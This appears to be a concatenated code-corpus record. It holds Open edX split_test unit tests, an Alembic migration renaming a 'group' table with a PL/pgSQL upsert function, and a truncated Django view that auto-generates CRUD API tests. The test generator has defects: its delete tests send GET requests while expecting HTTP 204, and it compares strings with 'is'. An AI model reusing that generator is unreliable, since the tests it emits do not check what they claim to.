editable_metadata_fields = self.split_test_module.editable_metadata_fields
self.assertIn(SplitTestDescriptor.display_name.name, editable_metadata_fields)
self.assertNotIn(SplitTestDescriptor.due.name, editable_metadata_fields)
self.assertNotIn(SplitTestDescriptor.user_partitions.name, editable_metadata_fields)
# user_partition_id will always appear in editable_metadata_settings, regardless
# of the selected value.
self.assertIn(SplitTestDescriptor.user_partition_id.name, editable_metadata_fields)
def test_non_editable_settings(self):
"""
Test the settings that are marked as "non-editable".
"""
non_editable_metadata_fields = self.split_test_module.non_editable_metadata_fields
self.assertIn(SplitTestDescriptor.due, non_editable_metadata_fields)
self.assertIn(SplitTestDescriptor.user_partitions, non_editable_metadata_fields)
self.assertNotIn(SplitTestDescriptor.display_name, non_editable_metadata_fields)
def test_available_partitions(self):
"""
Tests that the available partitions are populated correctly when editable_metadata_fields are called
"""
self.assertEqual([], SplitTestDescriptor.user_partition_id.values)
# user_partitions is empty, only the "Not Selected" item will appear.
self.split_test_module.user_partition_id = SplitTestFields.no_partition_selected['value']
self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
partitions = SplitTestDescriptor.user_partition_id.values
self.assertEqual(1, len(partitions))
self.assertEqual(SplitTestFields.no_partition_selected['value'], partitions[0]['value'])
# Populate user_partitions and call editable_metadata_fields again
self.split_test_module.user_partitions = [
UserPartition(
0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')],
self.random_scheme
),
# Only UserPartitions with scheme "random" will be returned as available options.
UserPartition(
1, 'non_random_partition', 'Will Not Be Returned', [Group("1", 'apple'), Group("2", 'banana')],
self.non_random_scheme
)
]
self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
partitions = SplitTestDescriptor.user_partition_id.values
self.assertEqual(2, len(partitions))
self.assertEqual(SplitTestFields.no_partition_selected['value'], partitions[0]['value'])
self.assertEqual(0, partitions[1]['value'])
self.assertEqual("first_partition", partitions[1]['display_name'])
# Try again with a selected partition and verify that there is no option for "No Selection"
self.split_test_module.user_partition_id = 0
self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
partitions = SplitTestDescriptor.user_partition_id.values
self.assertEqual(1, len(partitions))
self.assertEqual(0, partitions[0]['value'])
self.assertEqual("first_partition", partitions[0]['display_name'])
# Finally try again with an invalid selected partition and verify that "No Selection" is an option
self.split_test_module.user_partition_id = 999
self.split_test_module.editable_metadata_fields # pylint: disable=pointless-statement
partitions = SplitTestDescriptor.user_partition_id.values
self.assertEqual(2, len(partitions))
self.assertEqual(SplitTestFields.no_partition_selected['value'], partitions[0]['value'])
self.assertEqual(0, partitions[1]['value'])
self.assertEqual("first_partition", partitions[1]['display_name'])
def test_active_and_inactive_children(self):
"""
Tests the active and inactive children returned for different split test configurations.
"""
split_test_module = self.split_test_module
children = split_test_module.get_children()
# Verify that a split test has no active children if it has no specified user partition.
split_test_module.user_partition_id = -1
[active_children, inactive_children] = split_test_module.active_and_inactive_children()
self.assertEqual(active_children, [])
self.assertEqual(inactive_children, children)
# Verify that all the children are returned as active for a correctly configured split_test
split_test_module.user_partition_id = 0
split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')])
]
[active_children, inactive_children] = split_test_module.active_and_inactive_children()
self.assertEqual(active_children, children)
self.assertEqual(inactive_children, [])
# Verify that a split_test does not return inactive children in the active children
self.split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha')])
]
[active_children, inactive_children] = split_test_module.active_and_inactive_children()
self.assertEqual(active_children, [children[0]])
self.assertEqual(inactive_children, [children[1]])
# Verify that a split_test ignores misconfigured children
self.split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("2", 'gamma')])
]
[active_children, inactive_children] = split_test_module.active_and_inactive_children()
self.assertEqual(active_children, [children[0]])
self.assertEqual(inactive_children, [children[1]])
# Verify that a split_test referring to a non-existent user partition has no active children
self.split_test_module.user_partition_id = 2
[active_children, inactive_children] = split_test_module.active_and_inactive_children()
self.assertEqual(active_children, [])
self.assertEqual(inactive_children, children)
def test_validation_messages(self):
"""
Test the validation messages produced for different split test configurations.
"""
split_test_module = self.split_test_module
def verify_validation_message(message, expected_message, expected_message_type,
expected_action_class=None, expected_action_label=None,
expected_action_runtime_event=None):
"""
Verify that the validation message has the expected validation message and type.
"""
self.assertEqual(message.text, expected_message)
self.assertEqual(message.type, expected_message_type)
if expected_action_class:
self.assertEqual(message.action_class, expected_action_class)
else:
self.assertFalse(hasattr(message, "action_class"))
if expected_action_label:
self.assertEqual(message.action_label, expected_action_label)
else:
self.assertFalse(hasattr(message, "action_label"))
if expected_action_runtime_event:
self.assertEqual(message.action_runtime_event, expected_action_runtime_event)
else:
self.assertFalse(hasattr(message, "action_runtime_event"))
def verify_summary_message(general_validation, expected_message, expected_message_type):
"""
Verify that the general validation message has the expected validation message and type.
"""
self.assertEqual(general_validation.text, expected_message)
self.assertEqual(general_validation.type, expected_message_type)
# Verify the messages for an unconfigured user partition
split_test_module.user_partition_id = -1
validation = split_test_module.validate()
self.assertEqual(len(validation.messages), 0)
verify_validation_message(
validation.summary,
u"The experiment is not associated with a group configuration.",
StudioValidationMessage.NOT_CONFIGURED,
'edit-button',
u"Select a Group Configuration",
)
# Verify the messages for a correctly configured split_test
split_test_module.user_partition_id = 0
split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')])
]
validation = split_test_module.validate_split_test()
self.assertTrue(validation)
self.assertIsNone(split_test_module.general_validation_message(), None)
# Verify the messages for a split test with too few groups
split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition',
[Group("0", 'alpha'), Group("1", 'beta'), Group("2", 'gamma')])
]
validation = split_test_module.validate()
self.assertEqual(len(validation.messages), 1)
verify_validation_message(
validation.messages[0],
u"The experiment does not contain all of the groups in the configuration.",
StudioValidationMessage.ERROR,
expected_action_runtime_event='add-missing-groups',
expected_action_label=u"Add Missing Groups"
)
verify_summary_message(
validation.summary,
u"This content experiment has issues that affect content visibility.",
StudioValidationMessage.ERROR
)
# Verify the messages for a split test with children that are not associated with any group
split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition',
[Group("0", 'alpha')])
]
validation = split_test_module.validate()
self.assertEqual(len(validation.messages), 1)
verify_validation_message(
validation.messages[0],
u"The experiment has an inactive group. Move content into active groups, then delete the inactive group.",
StudioValidationMessage.WARNING
)
verify_summary_message(
validation.summary,
u"This content experiment has issues that affect content visibility.",
StudioValidationMessage.WARNING
)
# Verify the messages for a split test with both missing and inactive children
split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition',
[Group("0", 'alpha'), Group("2", 'gamma')])
]
validation = split_test_module.validate()
self.assertEqual(len(validation.messages), 2)
verify_validation_message(
validation.messages[0],
u"The experiment does not contain all of the groups in the configuration.",
StudioValidationMessage.ERROR,
expected_action_runtime_event='add-missing-groups',
expected_action_label=u"Add Missing Groups"
)
verify_validation_message(
validation.messages[1],
u"The experiment has an inactive group. Move content into active groups, then delete the inactive group.",
StudioValidationMessage.WARNING
)
# With two messages of type error and warning priority given to error.
verify_summary_message(
validation.summary,
u"This content experiment has issues that affect content visibility.",
StudioValidationMessage.ERROR
)
# Verify the messages for a split test referring to a non-existent user partition
split_test_module.user_partition_id = 2
validation = split_test_module.validate()
self.assertEqual(len(validation.messages), 1)
verify_validation_message(
validation.messages[0],
u"The experiment uses a deleted group configuration. "
u"Select a valid group configuration or delete this experiment.",
StudioValidationMessage.ERROR
)
verify_summary_message(
validation.summary,
u"This content experiment has issues that affect content visibility.",
StudioValidationMessage.ERROR
)
# Verify the message for a split test referring to a non-random user partition
split_test_module.user_partitions = [
UserPartition(
10, 'incorrect_partition', 'Non Random Partition', [Group("0", 'alpha'), Group("2", 'gamma')],
scheme=self.non_random_scheme
)
]
split_test_module.user_partition_id = 10
validation = split_test_module.validate()
self.assertEqual(len(validation.messages), 1)
verify_validation_message(
validation.messages[0],
u"The experiment uses a group configuration that is not supported for experiments. "
u"Select a valid group configuration or delete this experiment.",
StudioValidationMessage.ERROR
)
verify_summary_message(
validation.summary,
u"This content experiment has issues that affect content visibility.",
StudioValidationMessage.ERROR
)
| agpl-3.0 |
intel-ctrlsys/actsys | datastore/datastore/database_schema/schema_migration/versions/d43655797899_changing_table_name_from_group_to_.py | 1 | 2060 | """Changing table name from 'group' to 'device_group'
Revision ID: d43655797899
Revises: 38f3c80e9932
Create Date: 2017-08-24 15:17:10.671537
"""
import textwrap
from alembic import op
# revision identifiers, used by Alembic.
revision = 'd43655797899'
down_revision = '38f3c80e9932'
branch_labels = None
depends_on = None
def upgrade():
op.execute(textwrap.dedent("""ALTER TABLE public.group RENAME TO device_group;"""))
op.execute(textwrap.dedent("""
CREATE OR REPLACE FUNCTION public.upsert_group(p_group_name character varying, p_device_list character varying)
RETURNS integer AS
$BODY$
DECLARE num_rows integer;
BEGIN
INSERT INTO public.device_group AS gro (group_name, device_list)
VALUES (p_group_name, p_device_list)
ON CONFLICT (group_name) DO UPDATE
SET
device_list = p_device_list
WHERE gro.group_name = p_group_name;
GET DIAGNOSTICS num_rows = ROW_COUNT;
RETURN num_rows;
END;
$BODY$
LANGUAGE plpgsql VOLATILE
COST 100;"""))
def downgrade():
op.execute(textwrap.dedent("""ALTER TABLE device_group RENAME TO "group";"""))
op.execute(textwrap.dedent("""
CREATE OR REPLACE FUNCTION public.upsert_group(p_group_name character varying, p_device_list character varying)
RETURNS integer AS
$BODY$
DECLARE num_rows integer;
BEGIN
INSERT INTO public.group AS gro (group_name, device_list)
VALUES (p_group_name, p_device_list)
ON CONFLICT (group_name) DO UPDATE
SET
device_list = p_device_list
WHERE gro.group_name = p_group_name;
GET DIAGNOSTICS num_rows = ROW_COUNT;
RETURN num_rows;
END;
$BODY$
LANGUAGE plpgsql VOLATILE
COST 100;"""))
| apache-2.0 |
SafeStack/ava | ava_core/test_builder/views.py | 2 | 40881 | # Python Imports
from logging import getLogger
import json
import os
import shutil
# Django Imports
from django.apps import *
from django.conf import settings
from django.http import HttpResponse
# Rest Imports
from rest_framework.views import APIView
from rest_framework import status
# Logger
log = getLogger(__name__)
"""
Helper functions
"""
def plain_to_bumpy(plain):
bumpy = ''
if len(plain) is not 0:
to_upper = True
for character in plain:
if to_upper:
bumpy += character.upper()
to_upper = False
elif character is ' ':
to_upper = True
else:
bumpy += character
return bumpy
def bumpy_to_plain(bumpy):
plain = ''
if len(bumpy) is not 0:
plain += bumpy[0].lower()
for character in bumpy[1:]:
if character.isupper():
plain += ' '
plain += character.lower()
return plain
def plain_to_snake(plain):
snake = ''
for character in plain:
if character is ' ':
snake += '_'
else:
snake += character
return snake
def snake_to_plain(snake):
plain = ''
for character in snake:
if character is '_':
plain += ' '
else:
plain += character
return plain
def bumpy_to_snake(bumpy):
return plain_to_snake(bumpy_to_plain(bumpy))
def snake_to_bumpy(snake):
return plain_to_bumpy(snake_to_plain(snake))
def write_to_file(path, data, archive_old=False):
# Check that the setting for storing locally is true.
# True - Update path to be within the media file for test builder.
if settings.TEST_BUILDER_STORE_TEMP:
path_split = path.rsplit('/', 1)
directory = '{}output/{}/'.format(settings.TEST_BUILDER_DIRECTORY, path_split[0])
# Attempt to create the new directory.
# Directory exists on exception.
try:
os.makedirs(directory)
except FileExistsError:
pass
# Update the used path variable
path = directory + path_split[1]
# Check that the file already exists and archiving is set.
# True - copy current file with '.old_n' prefixed (where n is the first available digit).
if os.path.isfile(path) and archive_old and not settings.TEST_BUILDER_FORCE_NO_ARCHIVE:
# Create template for path format.
path_template = '{}.old_{{}}'.format(path)
# Create initial path
archive_digit = 0
old_path = path_template.format(archive_digit)
# Increment archive digit until a file is not found.
while os.path.isfile(old_path):
archive_digit += 1
old_path = path_template.format(archive_digit)
# Copy current file to old file.
shutil.copyfile(path, old_path)
# Output data to path
with open(path, 'w') as outfile:
print(data, file=outfile)
outfile.close()
"""
Creates the data for a project
"""
class ProjectDataBuilder(APIView):
def get(self, request):
# Load settings from Django.
prefix = settings.TEST_BUILDER_INPUT_APP_PREFIX
ignore_apps = settings.TEST_BUILDER_IGNORED_APPS
ignore_models = settings.TEST_BUILDER_IGNORED_MODELS
# Iterate over app configs, storing related data.
project_data = dict()
for app in apps.get_app_configs():
# Check that app isn't to be ignored and is a part of the project directory.
# True - Iterate over apps models, gathering relevant data.
if app.name not in ignore_apps and app.name.startswith(prefix):
# Iterate over models in app, storing relevant information.
app_data = dict()
for model in app.get_models():
# Check the model belongs to the app to avoid inheritance and abstraction,
# and check that it is not an ignored model.
# True - Format the data for model, adding it to app data.
if app.name in str(model) and str(model) not in ignore_models:
# Strip the model name from string
model_name = str(model).split('\'')[1].split('.')[-1]
app_data[model_name] = self.generate_model_data(model)
# Add apps model data to dict.
project_data[app.name] = app_data
# Attempt to create directory for files.
# Passing if already created.
directory_name = settings.TEST_BUILDER_DIRECTORY
try:
os.makedirs(directory_name)
except FileExistsError:
pass
# Format output file name and output json dump of project data.
file_name = '{}{}.json'.format(directory_name, settings.TEST_BUILDER_PROJECT_DATA_OUTPUT)
json_data = json.dumps(obj=project_data,
sort_keys=True,
indent=4,
separators=(',', ': '))
write_to_file(file_name, json_data, True)
return HttpResponse('Success', status=status.HTTP_200_OK)
def generate_model_data(self, model):
# Load settings from Django.
ignore_fields = settings.TEST_BUILDER_IGNORED_FIELDS
# Iterate over all fields on the model, gathering relevant data.
field_data = dict()
for field in model._meta.get_fields(include_parents=False, include_hidden=False):
# Check that field is not in ignored fields settings.
# True - Store field data for return.
if field.name not in ignore_fields:
fields_data = self.generate_field_data(field)
if fields_data:
field_data[field.name] = fields_data
# Populate the model data with default values to be processed by user.
model_data = dict()
model_data['fields'] = field_data
model_data['url'] = '/example'
model_data['permissions'] = {
'admin': ['PUSH', 'GET', 'PUT', 'DELETE'],
'user': ['PUSH', 'GET', 'PUT', 'DELETE']
}
model_data['requires_owner'] = True
model_data['requires_authentication'] = True
model_data['unique_together'] = []
return model_data
def generate_field_data(self, field):
# Attempt to get the internal type of the field.
# Returning None on failure.
try:
field_type = field.get_internal_type()
except AttributeError:
return None
# Gather relevant data for field.
field_data = dict()
field_data['type'] = field_type
if field_data['type'] == 'ForeignKey':
_break = 4
self.generate_field_attribute(field, field_data, 'max_length')
self.generate_field_attribute(field, field_data, 'unique')
self.generate_field_attribute(field, field_data, 'null')
self.generate_field_attribute(field, field_data, 'blank')
# field_data = self.generate_field_attribute(field, field_data, 'default')
self.generate_field_attribute(field, field_data, 'related_model')
if 'related_model' in field_data:
field_data['related_model'] = str(field_data['related_model']).split('\'')[1]
self.generate_field_attribute(field, field_data, 'choices')
if 'choices' in field_data:
choices = field_data['choices']
if len(choices) is not 0:
choice_list = []
for choice in choices:
choice_list.append(choice[0])
field_data['choices'] = choice_list
else:
field_data.pop('choices', None)
return field_data
@staticmethod
def generate_field_attribute(field, field_dict, attribute_name):
# Check that the attribute name belongs to the field.
# True - Update the field dictionary with the attributes value.
attr = getattr(field, attribute_name, None)
if attr is not None:
field_dict[attribute_name] = attr
"""
Creates the tests for a project
"""
class ProjectTestBuilder(APIView):
def get(self, request):
# Attempt to open JSON input file with project information.
# Return bad request response on failure.
try:
file_name = '{}{}.json'.format(settings.TEST_BUILDER_DIRECTORY,
settings.TEST_BUILDER_PROJECT_DATA_INPUT)
with open(file_name) as data_file:
self.project_data = json.load(data_file)
data_file.close()
except:
return HttpResponse('No input file.', status=status.HTTP_400_BAD_REQUEST)
# Attempt to copy template file to new directory.
# Return bad request response on failure.
try:
# Take a copy of the template data.
file_name = '{}test_template.py'.format(settings.TEST_BUILDER_DIRECTORY)
with open(file_name) as data_file:
# Create file path for the output of copy.
directory_name = '{}/test.py'.format(settings.TEST_BUILDER_ABSTRACT_DIRECTORY)
# Format the data for appropriate usage.
data = data_file.read().format(project_name_snake=settings.TEST_BUILDER_INPUT_APP_PREFIX,
project_name_bumpy=snake_to_bumpy(
settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Write the data to file.
write_to_file(directory_name, data)
# Close the file handle.
data_file.close()
except FileNotFoundError:
return HttpResponse('No test template file.', status=status.HTTP_400_BAD_REQUEST)
# Attempt to copy template file to new directory.
# Return bad request response on failure.
try:
# Take a copy of the template data.
file_name = '{}test_data_template.py'.format(settings.TEST_BUILDER_DIRECTORY)
with open(file_name) as data_file:
# Create file path for the output of copy.
directory_name = '{}/test_data.py'.format(settings.TEST_BUILDER_ABSTRACT_DIRECTORY)
# Format the data for appropriate usage.
data = data_file.read().format(project_name=snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Write the data to file.
write_to_file(directory_name, data)
# Close the file handle.
data_file.close()
except FileNotFoundError:
return HttpResponse('No test data template file.', status=status.HTTP_400_BAD_REQUEST)
# Iterate over apps in project data, creating all necessary files.
for app, app_name in self.project_data.items():
# Create the test and data files for app.
test_output = self.generate_app_test(app_name=app,
app_data=self.project_data[app])
data_output = self.generate_app_data(app_name=app,
app_data=self.project_data[app])
# Create output directory name.
directory_name = '{}/{}/'.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
app.split('.', 1)[1].replace('.', '/'))
# Format output file name and output test and test data.
test_file = '{}tests.py'.format(directory_name)
write_to_file(test_file, test_output, True)
test_file = '{}test_data.py'.format(directory_name)
write_to_file(test_file, data_output, True)
return HttpResponse('Success.', status=status.HTTP_200_OK)
"""
Helper functions
"""
def get_model_data_from_name(self, model_name):
# Iterate over apps in project.
for app, app_data in self.project_data.items():
# Iterate over models in app.
for model, model_data in app_data.items():
# Check if current model name is the same as that passed.
# True - return the models data
if model in model_name:
return model_data
return None
"""
Output formatting for tests
"""
def generate_app_test(self, app_name, app_data):
# Create empty string for app file.
app_string = str()
# Store app information for future reference.
self.current_app_name = app_name
self.current_app_data = app_data
# Add header data to out string.
app_string += self.generate_header_test(app_name=app_name,
app_data=app_data) + '\n\n'
# Iterate over models in app, adding data to out string.
app_string += '# Implementation\n'
for model, model_data in app_data.items():
app_string += self.generate_model_test(model_name=model,
model_data=model_data)
app_string += '\n'
# Replace tabs with spaces
out_string = str()
for character in app_string:
if character is '\t':
out_string += ' '
else:
out_string += character
return out_string
def generate_header_test(self, app_name, app_data):
out_string = str()
# Format the dependency imports header for app file.
out_string += '# Rest Imports\n'
out_string += 'from rest_framework import status\n'
# Format the local imports header for app file.
out_string += '# Local Imports\n'
out_string += 'from {}.abstract.test import {}Test\n' \
.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Make initial formatting for model imports
data_import = 'from {}.{}.test_data import'.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX,
app_name.split('.', 1)[1])
# Iterate over apps models, creating necessary imports.
first_iteration = True
for model in app_data:
data_import += (' ' if first_iteration else ', ') + model + 'TestData'
first_iteration = False
out_string += data_import + '\n'
return out_string
def generate_model_test(self, model_name, model_data):
out_string = str()
# Create test model header
out_string += 'class {}Test({}Test):\n'.format(model_name,
snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
out_string += '\t\"\"\"\n'
out_string += '\t{} Test\n'.format(model_name)
out_string += '\t\"\"\"\n'
out_string += '\n'
# Create setup for tests
out_string += '\tdef setUp(self):\n'
out_string += '\t\t# Make call to super.\n'
out_string += '\t\tsuper({}Test, self).setUp()\n'.format(snake_to_bumpy(model_name))
out_string += '\n'
out_string += '\t\t# Set the data type.\n'
out_string += '\t\tself.data = {}TestData\n'.format(model_name)
out_string += '\t\tself.data.init_requirements()\n'
out_string += '\n'
# Create each of the CRUD test functions
out_string += self.generate_create_tests(model_name, model_data)
out_string += self.generate_retrieve_tests(model_name, model_data)
out_string += self.generate_update_tests(model_name, model_data)
out_string += self.generate_delete_tests(model_name, model_data)
return out_string
def generate_create_tests(self, model_name, model_data):
out_string = str()
# Create tests as user, admin and unauthenticated.
out_string += self.generate_create_as_tests(model_name, model_data, 'user')
out_string += self.generate_create_as_tests(model_name, model_data, 'admin')
out_string += self.generate_create_as_tests(model_name, model_data)
return out_string
def generate_create_as_tests(self, model_name, model_data, user=None):
out_string = str()
# Create function header
out_string += '\tdef test_{}_create_as_{}(self):\n'.format(bumpy_to_snake(model_name),
user if user is not None else 'unauthenticated')
# Create required login
if user is not None:
out_string += '\t\t# Log in as {}.\n'.format(user)
out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
out_string += '\n'
# Create count storage
out_string += '\t\t# Take count.\n'
out_string += '\t\tcount = self.data.model.objects.count()\n'
out_string += '\n'
# Determine if push was successful
create_successful = False
if user in model_data['permissions'] and 'PUSH' in model_data['permissions'][user]:
create_successful = True
elif user is None and not model_data['requires_authentication']:
create_successful = True
# Create data storage
out_string += '\t\t# Store data to use.\n'
out_string += '\t\tdata = self.data.get_data(\'standard\')\n'
out_string += '\n'
# Create push request
out_string += '\t\t# Make post request and ensure {} response.\n'.format(
'created' if create_successful else 'unauthorized')
out_string += '\t\tresponse = self.client.post(self.format_url(self.data.url), data, format=\'json\')\n'
if create_successful:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_201_CREATED)\n'
out_string += '\t\tself.assertEqual(self.data.model.objects.count(), count + 1)\n'
out_string += '\t\tself.assertTrue(self.does_contain_data(response.data, data))\n'
out_string += '\n'
else:
out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
out_string += '\t\tself.assertEqual(self.data.model.objects.count(), count)\n'
out_string += '\n'
return out_string
def generate_retrieve_tests(self, model_name, model_data):
out_string = str()
out_string += self.generate_retrieve_as_tests(model_name, model_data, False, 'user')
out_string += self.generate_retrieve_as_tests(model_name, model_data, True, 'user')
out_string += self.generate_retrieve_as_tests(model_name, model_data, False, 'admin')
out_string += self.generate_retrieve_as_tests(model_name, model_data, True, 'admin')
out_string += self.generate_retrieve_as_tests(model_name, model_data, False)
out_string += self.generate_retrieve_as_tests(model_name, model_data, True)
if 'requires_owner' in model_data and model_data['requires_owner']:
out_string += '\t# TODO:\tWrite retrieve owner tests'
pass
return out_string
def generate_retrieve_as_tests(self, model_name, model_data, all=False, user=None):
out_string = str()
out_string += '\tdef test_{}_retrieve_{}_as_{}(self):\n'.format(bumpy_to_snake(model_name),
'all' if all else 'single',
user if user is not None else 'unauthorized')
if all:
out_string += '\t\t# Create new {} models.\n'.format(model_name)
out_string += '\t\tself.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n'.format(
user if user is not None else 'admin')
out_string += '\t\tself.create_model_logout(self.data, data_name=\'modified\', owner=self.user_{})\n'.format(
user if user is not None else 'admin')
out_string += '\n'
else:
out_string += '\t\t# Create new {} models, storing URL.\n'.format(model_name)
out_string += '\t\turl = self.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n'.format(
user if user is not None else 'admin')
out_string += '\n'
# Create required login
if user is not None:
out_string += '\t\t# Log in as {}.\n'.format(user)
out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
out_string += '\n'
# Determine if get was successful
retrieve_successful = False
if user in model_data['permissions'] and 'GET' in model_data['permissions'][user]:
retrieve_successful = True
elif user is None and not model_data['requires_authentication']:
retrieve_successful = True
out_string += '\t\t# Make get request and ensure {} response\n'.format(
'OK' if retrieve_successful else 'unauthorized')
out_string += '\t\tresponse = self.client.get({})\n'.format('self.format_url(self.data.url)' if all else 'url')
if retrieve_successful:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n'
if all:
out_string += '\t\tself.assertTrue(self.does_contain_data_list(response.data[\'results\'], [self.data.standard, self.data.modified]))\n'
else:
out_string += '\t\tself.assertTrue(self.does_contain_data(response.data, self.data.standard))\n'
else:
out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
out_string += '\n'
return out_string
def generate_update_tests(self, model_name, model_data):
out_string = str()
out_string += self.generate_update_as_tests(model_name, model_data, True, 'user')
out_string += self.generate_update_as_tests(model_name, model_data, False, 'user')
out_string += self.generate_update_as_tests(model_name, model_data, True, 'admin')
out_string += self.generate_update_as_tests(model_name, model_data, False, 'admin')
out_string += self.generate_update_as_tests(model_name, model_data, True)
out_string += self.generate_update_as_tests(model_name, model_data, False)
if 'requires_owner' in model_data and model_data['requires_owner']:
out_string += '\t# TODO:\tWrite update owner tests'
pass
return out_string
def generate_update_as_tests(self, model_name, model_data, exists=False, user=None):
out_string = str()
out_string += '\tdef test_{}_update_{}_as_{}(self):\n'.format(bumpy_to_snake(model_name),
'exists' if exists else 'does_not_exist',
user if user is not None else 'unauthorized')
if exists:
out_string += '\t\t# Create new {} models, storing URL.\n'.format(model_name)
out_string += '\t\turl = self.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n' \
.format(user if user is not None else 'admin')
# Create required login
if user is not None:
out_string += '\t\t# Log in as {}.\n'.format(user)
out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
out_string += '\n'
# Determine if delete was successful
put_successful = False
if user in model_data['permissions'] and 'PUT' in model_data['permissions'][user]:
put_successful = True
elif user is None and not model_data['requires_authentication']:
put_successful = True
out_string += '\t\t# Make put request and ensure {} response.\n'\
.format(('OK' if exists else 'not found') if put_successful else 'unauthorized')
out_string += '\t\tresponse = self.client.put({}, self.data.get_data(\'unique\'))\n' \
.format('url' if exists else 'self.format_url(self.data.url + \'/9999\')')
if put_successful:
if exists:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n'
else:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n'
else:
out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
if exists:
out_string += '\t\tself.assertTrue(self.does_contain_data_url(url, self.data.{}))\n'\
.format('unique' if put_successful else 'standard')
out_string += '\n'
return out_string
def generate_delete_tests(self, model_name, model_data):
out_string = str()
out_string += self.generate_delete_as_tests(model_name, model_data, True, 'user')
out_string += self.generate_delete_as_tests(model_name, model_data, False, 'user')
out_string += self.generate_delete_as_tests(model_name, model_data, True, 'admin')
out_string += self.generate_delete_as_tests(model_name, model_data, False, 'admin')
out_string += self.generate_delete_as_tests(model_name, model_data, True)
out_string += self.generate_delete_as_tests(model_name, model_data, False)
if 'requires_owner' in model_data and model_data['requires_owner']:
out_string += '\t# TODO:\tWrite delete owner tests'
pass
return out_string
def generate_delete_as_tests(self, model_name, model_data, exists=False, user=None):
out_string = str()
out_string += '\tdef test_{}_delete_{}_as_{}(self):\n'.format(bumpy_to_snake(model_name),
'exists' if exists else 'does_not_exist',
user if user is not None else 'unauthorized')
if exists:
out_string += '\t\t# Create new {} models, storing URL.\n'.format(model_name)
out_string += '\t\turl = self.create_model_logout(self.data, data_name=\'standard\', owner=self.user_{})\n' \
.format(user if user is not None else 'admin')
# Create required login
if user is not None:
out_string += '\t\t# Log in as {}.\n'.format(user)
out_string += '\t\tself.login_user(self.user_{})\n'.format(user)
out_string += '\n'
# Determine if delete was successful
delete_successful = False
if user in model_data['permissions'] and 'DELETE' in model_data['permissions'][user]:
delete_successful = True
elif user is None and not model_data['requires_authentication']:
delete_successful = True
out_string += '\t\t# Make delete request and ensure {} response\n' \
.format(('no content' if exists else 'not found') if delete_successful else 'unauthorized')
out_string += '\t\tresponse = self.client.get({})\n' \
.format('url' if exists else 'self.format_url(self.data.url + \'/9999\')')
if delete_successful:
if exists:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n'
else:
out_string += '\t\tself.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n'
else:
out_string += '\t\tself.assertIn(response.status_code, self.status_forbidden)\n'
if exists:
out_string += '\t\tself.assertEqual(self.data.model.objects.count(), {})\n'\
.format('0' if delete_successful else '1')
out_string += '\n'
return out_string
"""
Output formatting for test data
"""
def generate_app_data(self, app_name, app_data):
# Create empty string for app file.
app_string = str()
app_string += self.generate_header_data(app_name, app_data) + '\n\n'
app_string += '# Implementation\n'
for model in app_data:
app_string += '{}\n\n'.format(self.generate_model_data(model_name=model,
model_data=app_data[model]))
# Replace tabs with spaces
out_string = str()
for character in app_string:
if character is '\t':
out_string += ' '
else:
out_string += character
return out_string
def generate_header_data(self, app_name, app_data):
out_string = str()
# Format the dependency imports header for app file.
out_string += '# Rest Imports\n'
out_string += 'from rest_framework import status\n'
# Format the local imports header for app file.
out_string += '# Local Imports\n'
out_string += 'from {}.abstract.test_data import {}TestData\n' \
.format(settings.TEST_BUILDER_OUTPUT_APP_PREFIX, snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
# Create a dictionary that contains all files that need to be imported.
requirements_dict = dict()
# Iterate over the models in the current app and add them.
requirements_dict[app_name] = list()
for model, model_data in app_data.items():
# Check if current model isn't in the ignored list and currently in dictionary.
# True - add to dictionary for current model.
if model not in settings.TEST_BUILDER_IGNORED_MODELS and model not in requirements_dict[app_name]:
requirements_dict[app_name].append(model)
# Iterate over the app, model pairs in required imports.
for app, models in requirements_dict.items():
# Format the start of the import lines.
required_models = 'from {}.{}.models import' \
.format(settings.TEST_BUILDER_INPUT_APP_PREFIX, app.split('.', 1)[1])
# Iterate over models using enumerate to keep a number.
for count, model in enumerate(models):
# Add formatted model to each string.
# Use count to determine if space or comma used.
required_models += (' ' if count == 0 else ', ') + model
# Add required models to the output string.
out_string += required_models + '\n'
return out_string
def generate_model_data(self, model_name, model_data):
out_string = str()
out_string += 'class {}TestData({}TestData):\n' \
.format(model_name, snake_to_bumpy(settings.TEST_BUILDER_OUTPUT_APP_PREFIX))
out_string += '\t\"\"\"\n'
out_string += '\tTest data for {}\n'.format(model_name)
out_string += '\t\"\"\"\n'
